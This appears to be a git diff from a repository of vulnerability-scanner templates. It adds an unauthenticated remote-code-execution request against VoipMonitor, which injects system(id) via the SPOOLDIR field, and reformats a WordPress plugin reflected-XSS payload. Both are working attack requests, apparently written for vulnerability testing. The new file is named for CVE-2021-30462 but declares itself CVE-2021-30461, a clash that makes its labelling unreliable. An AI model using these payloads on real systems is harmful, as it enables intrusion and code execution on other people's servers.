diff --git a/date.txt b/date.txt index dcf1ca303e..d04e3ab904 100644 --- a/date.txt +++ b/date.txt @@ -1 +1 @@ -20241013 +20241014 diff --git a/poc.txt b/poc.txt index 5937b875d6..446d1667c9 100644 --- a/poc.txt +++ b/poc.txt @@ -50399,6 +50399,7 @@ ./poc/cve/cve-2021-30461-6056.yaml ./poc/cve/cve-2021-30461-6057.yaml ./poc/cve/cve-2021-30461.yaml +./poc/cve/cve-2021-30462.yaml ./poc/cve/cve-2021-30497-6058.yaml ./poc/cve/cve-2021-30497-6059.yaml ./poc/cve/cve-2021-30497-6060.yaml diff --git a/poc/cve/cve-2015-2807-2498.yaml b/poc/cve/cve-2015-2807-2498.yaml index 629ffb8b95..b39565c245 100644 --- a/poc/cve/cve-2015-2807-2498.yaml +++ b/poc/cve/cve-2015-2807-2498.yaml @@ -1,4 +1,5 @@ id: CVE-2015-2807 + info: name: Navis DocumentCloud 0.1 - Unauthenticated Reflected Cross-Site Scripting (XSS) author: daffainfo @@ -8,20 +9,24 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2015-2807 tags: cve,cve2015,wordpress,wp-plugin,xss description: "Cross-site scripting (XSS) vulnerability in js/window.php in the Navis DocumentCloud plugin before 0.1.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the wpbase parameter." + requests: - method: GET path: - "{{BaseURL}}/wp-content/plugins/navis-documentcloud/js/window.php?wpbase=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + matchers-condition: and matchers: - type: word words: - '' part: body + - type: word part: header words: - text/html + - type: status status: - 200 diff --git a/poc/cve/cve-2021-30462.yaml b/poc/cve/cve-2021-30462.yaml new file mode 100644 index 0000000000..3e99ae09d3 --- /dev/null +++ b/poc/cve/cve-2021-30462.yaml @@ -0,0 +1,38 @@ +id: CVE-2021-30461 + +info: + name: VoipMonitor Pre-Auth-RCE + author: nithissh + severity: critical + description: A malicious actor can trigger Un authenticated Remote Code Execution using CVE-2021-30461. + tags: cve,cve2021,rce,voipmonitor + reference: https://ssd-disclosure.com/ssd-advisory-voipmonitor-unauth-rce/ + +requests: + - raw: + - | + POST /index.php HTTP/1.1 + Host: {{Hostname}} + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 + Accept-Language: en-US,en;q=0.5 + Accept-Encoding: gzip, deflate + Connection: close + Content-Type: application/x-www-form-urlencoded + Content-Length: 35 + + SPOOLDIR=test".system(id)."&recheck=Recheck + + matchers-condition: and + matchers: + - type: word + words: + - "uid=" + - "gid=" + - "groups=" + - "VoIPmonitor installation" + part: body + condition: and + + - type: status + status: + - 200